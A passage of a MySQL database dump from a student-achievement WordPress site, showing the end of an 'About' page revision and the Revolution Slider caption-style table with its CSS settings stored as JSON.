2006).”</span>  </em></strong>(read the full study <a href=\"https://www.psychologytoday.com/ca/blog/the-moment-youth/201803/goal-setting-is-linked-higher-achievement\">here</a>)</p>\r\n[/vc_column_text][/vc_column][/vc_row]','About','','inherit','closed','closed','','7-revision-v1','','','2020-11-06 01:30:42','2020-11-06 01:30:42','',7,'http://highperformingstudent.com/2020/11/06/7-revision-v1/',0,'revision','',0);
/*!40000 ALTER TABLE `wpii_posts` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpii_revslider_css`
--

DROP TABLE IF EXISTS `wpii_revslider_css`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpii_revslider_css` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `hover` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `advanced` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `params` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=110 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpii_revslider_css`
--

LOCK TABLES `wpii_revslider_css` WRITE;
/*!40000 ALTER TABLE `wpii_revslider_css` DISABLE KEYS */;
INSERT INTO `wpii_revslider_css` VALUES (1,'.tp-caption.medium_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\"}'),(2,'.tp-caption.small_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(3,'.tp-caption.medium_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(4,'.tp-caption.large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(5,'.tp-caption.very_large_text','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(6,'.tp-caption.very_big_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\",\"padding-top\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"padding\":\"0px 4px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(9,'.tp-caption.modern_medium_fat_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(10,'.tp-caption.modern_medium_light','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(11,'.tp-caption.modern_big_bluebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\"}'),(12,'.tp-caption.modern_big_redbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"padding-top\":\"1px\",\"letter-spacing\":\"0\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\"}'),(13,'.tp-caption.modern_small_text_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"white-space\":\"nowrap\"},\"hover\":\"\"}','{\"color\":\"#555\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\"}'),(14,'.tp-caption.boxshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"},\"hover\":\"\"}','[]'),(15,'.tp-caption.black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000\"}'),(16,'.tp-caption.noshadow','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','[]'),(17,'.tp-caption.thinheadline_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"rgba(0,0,0,0.85)\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#000\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"position\":\"absolute\",\"text-shadow\":\"none\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\"},\"hover\":\"\"}','{\"color\":\"#fff\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"-1.5px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\"},\"hover\":\"\"}','{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px 4px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"width\":\"4000px\",\"height\":\"150px\"},\"hover\":\"\"}','{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'),(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"